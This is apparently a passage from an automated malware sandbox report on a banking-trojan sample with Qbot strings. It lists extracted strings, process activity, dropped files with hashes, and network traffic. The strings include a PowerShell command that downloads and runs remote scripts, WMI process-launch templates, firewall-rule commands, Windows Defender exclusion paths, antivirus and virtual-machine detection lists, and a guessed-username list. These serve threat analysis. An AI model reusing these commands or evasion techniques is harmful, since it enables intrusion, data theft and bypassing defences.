InternetReadFile
InternetReadFileExA
InternetSetOptionA
InternetSetStatusCallback
InternetWriteFile
LdrGetProcedureAddress
LdrLoadDll
LoadLibraryA
LoadResource
LocalFree
LookupAccountSidA
LookupAccountSidW
MBAMService.exe;mbamgui.exe
MessageBoxA
Microsoft
MicrosoftEdge.exe
Module32First
Module32Next
MoveFileA
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
MsMpEng.exe
NAT-PMP %u tcp
NetApiBufferFree
NetGetDCName
NetShareEnum
NetUserEnum
NetWkstaGetInfo
NtAllocateVirtualMemory
NtClose
NtCreateSection
NtFreeVirtualMemory
NtGetContextThread
NtMapViewOfSection
NtProtectVirtualMemory
NtQueryInformationProcess
NtQueryVirtualMemory
NtReadVirtualMemory
NtSetContextThread
NtUnmapViewOfSection
NtWow64QueryInformationProcess64
NtWow64ReadVirtualMemory64
NtWriteVirtualMemory
ObtainUserAgentString
OpenProcess
OpenSCManagerW
OpenThread
PFXExportCertStore
PR_Close
PR_GetError
PR_GetNameForIdentity
PR_OpenTCPSocket
PR_Read
PR_SetError
PR_Write
PStoreCreateInstance
PathCombineA
PathCombineW
PathMatchSpecA
PathMatchSpecW
PathUnquoteSpacesW
PeekMessageA
PeekMessageW
PostMessageA
PostQuitMessage
Process32First
Process32Next
ProfileImagePath
QEMU
QueryFullProcessImageNameW
Query_Main
RapportGP.DLL
ReadFile
ReadProcessMemory
Red Hat VirtIO
RegCloseKey
RegCreateKeyExA
RegDeleteValueA
RegEnumKeyExA
RegEnumValueA
RegOpenKeyExA
RegQueryInfoKeyA
RegQueryValueExA
RegSetValueExA
RegisterClassExA
RtlGetVersion
RtlNtStatusToDosError
RtlSetLastWin32Error
SAVAdminService.exe;SavService.exe
SOFTWARE\Microsoft\Internet Explorer\CodeIntegrity
SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet
SOFTWARE\Microsoft\Microsoft Antimalware\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths
SOFTWARE\Microsoft\Windows Defender\SpyNet
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Wow6432Node\Microsoft AntiMalware\SpyNet
SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Spynet
SbieDll.dll
Self test FAILED!!!
Self test OK.
SendMessageA
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set colFiles = objWMIService.ExecQuery("Select * From CIM_DataFile Where Name = '%s'") For Each objFile in colFiles objFile.Copy("%s") Next
Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul)
SetCurrentDirectoryA
SetEndOfFile
SetEntriesInAclA
SetFilePointer
SetLastError
SetNamedSecurityInfoA
ShellExecuteA
ShowWindow
SizeofResource
SpyNetReporting
StackWalk64
StartServiceW
StrCmpIW
StrCmpNIA
StrStrIA
StrStrIW
StrStrW
StrTrimW
SubmitSamplesConsent
TranslateMessage
UnregisterClassA
UpdateWindow
VBoxGuest
VBoxVideo
VMAUDIO
VMware Accelerated
VMware Pointing
VMware Replay
VMware SCSI
VMware SVGA
VMware VMaudio
VMware Vista
VMware server memory
Virtual HD
VirtualAllocEx
VirtualFreeEx
VirtualProtect
VirtualProtectEx
WBJ_IGNORE
WEEKLY /D TUE,WED,THU /ST 12:00:00
WNetAddConnection2W
WNetCancelConnection2W
WNetCloseEnum
WNetEnumResourceW
WNetOpenEnumW
WRSA.exe
WSAConnect
WSAGetLastError
WSASend
WSASetLastError
WScript.Sleep %u Set objWMIService = GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\%coot\cimv2") Set objProcess = GetObject("winmgmts:root\cimv2:Win32_Process") errReturn = objProcess.Create("%s", null, nul, nul) WSCript.Sleep 2000 Set fso = CreateObject("Scripting.FileSystemObject")...
WTSEnumerateSessionsW
WTSFreeMemory
WTSQuerySessionInformationW
WTSQueryUserToken
WaitForSingleObject
Windows10 Edge HttpQueryInfo Bug!!!
WriteFile
WriteProcessMemory
ZwQueryInformationThread
ZwResumeThread
\sf2.dll
_decrypted.file;MultiAnalysis_v
aabcdeefghiijklmnoopqrstuuvwxyyz
aaebcdeeifghiiojklmnooupqrstuuyvwxyyaz
abc
abcdefghijklmnopqrstuvwxyz
administrator,argo,operator,administrador,user,prof,owner,usuario,admin,HP_Administrator,HP_Owner,Compaq_Owner,Compaq_Administrator
advapi32.dll
ansfltr
application/x-shockwave-flash
artifact.exe
aswhooka.dll
aswhookx.dll
avcuf32.dll
avgcsrvx.exe;avgsvcx.exe;avgcsrva.exe
avp.exe;kavtray.exe
bdagent.exe;vsserv.exe;vsservppl.exe
c1
c:\hiberfil.sysss
cashmanagementconnectionstring
ccSvcHst.exe
chrome.dll
chrome_child.dll
cmd /c schtasks.exe /Query > "%s"
cmd.exe /C \"start /MIN %s\system32\cscript.exe //E:javascript \"%s\"\" sudhfdus
cmd.exe /c ping -n 10 localhost && rmdir /S /Q "%s"
cmd=1&msg=%s&ports=
comet.yahoo.com;.hiro.tv;safebrowsing.google.com;geo.query.yahoo.com;googleusercontent.com;salesforce.com;officeapps.live.com;storage.live.com;messenger.live.com;.twimg.com;api.skype.com;mail.google.com;.bing.com;playtoga.com;.mozilla.com;.mozilla.org;hotbar.com;lphbs.com;contacts.msn.com;search.msn...
connect
coreServiceShell.exe;PccNTMon.exe;NTRTScan.exe
crypt32.dll
cryptui.dll
cscript.exe
data_after
data_before
data_end
data_inject
dbghelp.dll
dnsapi.dll
egui.exe;ekrn.exe
error res='%s' err=%d len=%u
exclude_url
explorer.exe
f1
firefox.exe
fmon.exe
fshoster32.exe
h1
h2
h3
https://
https://cdn.speedof.me/sample4096k.bin?r=0.%u
https://en.wikipedia.org/static/apple-touch/wikipedia.png
i1
i2
i3
i4
ignore_url
image/gif
image/jpeg
image/pjpeg
ivm-inject.dll
jHxastDcds)oMc=jvh7wdUhxcsdt2
k1
kb
kernel32.dll
m1
mcshield.exe
metsvc-server.exe
mlwr_smpl
mpr.dll
netapi32.dll
netsh advfirewall firewall add rule name="%s" dir=in action=allow program="%s" enable=yes
netsh firewall set allowedprogram "%s" %s ENABLE
netteller.com
npl
npq
nspr4.dll
nss3.dll
ntdll.dll
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/41zf98knyy5atko/001_01.ps1?dl=1'); IEX (New-Object Net.WebClient).DownloadString('https://www.dropbox.com/s/dh8flnrogfq1h1w/001.ps1?dl=1'); Invoke-MainWorker -Command '%s'"
pstorec.dll
qbot_conf_path='%S' username='%S'
qbot_run_mutex='%s' username='%S'
reg.exe ADD "HKLM\%s" /f /t %s /v "%s" /d "%s"
rsabase.dll
rsaenh.dll
s2
sample
sbtisht
send
set_url
shell32.dll
shlwapi.dll
siteadvisor.com;avgthreatlabs.com;safeweb.norton.com
snxhk_border_mywnd
srootkit
t=%s time=[%02d:%02d:%02d-%02d/%02d/%d]
tcpdump.exe;windump.exe;ethereal.exe;wireshark.exe;ettercap.exe;rtsniff.exe;packetcapture.exe;capturenet.exe
u1
urlmon.dll
user32.dll
vSockets
vkise.exe;isesrv.exe;cmdagent.exe
vm3dmp
vmacthlp.exe
vmdebug
vmnat.exe
vmrawdsk
vmscsi
vmtoolsd.exe
vmx_svga
vmxnet
w1
wbj.go
webinjects.cb
windbg.exe;ChromeUpdate.exe;msdev.exe;dbgview.exe;ollydbg.exe;ctfmon.exe;Proxifier.exe;nav.exe;Microsoft.Notes.exe;ShellExperienceHost.exe;SecHealthUI.exe
windump.exe
wininet.dll
wpcap.dll
ws2_32.dll
wtsapi32.dll
{%02X%02X%02X%02X-%02X%02X-%02X%02X-%02X%02X-%02X%02X%02X%02X%02X%02X}
2212C:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.exeC:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.exe8888888.png.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
0
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\roaming\microsoft\olhgykmnnfgq\fsoevv.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
3224\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3364ping.exe -n 6 127.0.0.1 C:\Windows\SysWOW64\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\ping.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
3988"C:\Windows\System32\cmd.exe" /c ping.exe -n 6 127.0.0.1 & type "C:\WINDOWS\System32\calc.exe" > "C:\Users\admin\AppData\Local\Temp\8888888.png.exe"C:\Windows\SysWOW64\cmd.exe
8888888.png.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
5000C:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.exe /CC:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.exefsoevv.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
0
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\roaming\microsoft\olhgykmnnfgq\fsoevv.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
6668C:\Users\admin\AppData\Local\Temp\8888888.png.exe /CC:\Users\admin\AppData\Local\Temp\8888888.png.exe8888888.png.exe
User:
admin
Company:
Lovelysoft
Integrity Level:
MEDIUM
Description:
Remote Performance Expert Helper Object
Exit code:
0
Version:
1.8.0.1800
Modules
Images
c:\users\admin\appdata\local\temp\8888888.png.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\user32.dll
6692"C:\WINDOWS\system32\mspaint.exe" "C:\Users\admin\Desktop\maintenancevariety.png"C:\Windows\System32\mspaint.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Paint
Exit code:
0
Version:
10.0.19041.3758 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mspaint.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\acgenral.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
1 397
Read events
1 368
Write events
28
Delete events
1

Modification events

(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:WindowPlacement
Value:
2C00000000000000010000000000000000000000FFFFFFFFFFFFFFFF7F000000470000007F04000087020000
(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:ShowThumbnail
Value:
0
(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:BMPWidth
Value:
0
(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:BMPHeight
Value:
0
(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:ThumbXPos
Value:
0
(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:ThumbYPos
Value:
0
(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:ThumbWidth
Value:
0
(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:ThumbHeight
Value:
0
(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:UnitSetting
Value:
0
(PID) Process:(6692) mspaint.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Applets\Paint\View
Operation:writeName:ShowRulers
Value:
0
Executable files
2
Suspicious files
1
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
3988cmd.exeC:\Users\admin\AppData\Local\Temp\8888888.png.exeexecutable
MD5:961E093BE1F666FD38602AD90A5F480F
SHA256:B183BD6414C5123465075D76D2413C999D569492FB543ACBC29690B4B745BDF2
15728888888.png.exeC:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.exeexecutable
MD5:136B9C85525BA66276B8C9F6B7014B0B
SHA256:A23EF053CCCF6A35FDA9ADC5F1702BA99A7BE695107D3BA5D1EA8C9C258299E4
15728888888.png.exeC:\Users\admin\AppData\Roaming\Microsoft\Olhgykmnnfgq\fsoevv.datbinary
MD5:C95FC06716BBB6B9BEA61049FFED7AC8
SHA256:C3D727D1A8AE54069D39DB5790DCFD9F9C584A1E063F6017D6852EB3A5022157
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
32
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.241.12:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
1176
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
3188
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
5628
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D
unknown
whitelisted
5064
SearchApp.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
unknown
whitelisted
3188
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5780
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
4712
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.16.241.12:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
2.23.209.179:443
www.bing.com
Akamai International B.V.
GB
whitelisted
1176
svchost.exe
20.190.159.68:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1176
svchost.exe
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 51.104.136.2
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.241.12
  • 2.16.241.19
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 184.30.21.171
whitelisted
google.com
  • 142.250.185.238
whitelisted
www.bing.com
  • 2.23.209.179
  • 2.23.209.133
  • 2.23.209.140
  • 2.23.209.149
  • 2.23.209.182
whitelisted
login.live.com
  • 20.190.159.68
  • 20.190.159.2
  • 20.190.159.73
  • 20.190.159.0
  • 40.126.31.67
  • 20.190.159.64
  • 20.190.159.23
  • 40.126.31.71
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 23.32.186.57
whitelisted
arc.msn.com
  • 20.223.35.26
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
8888888.png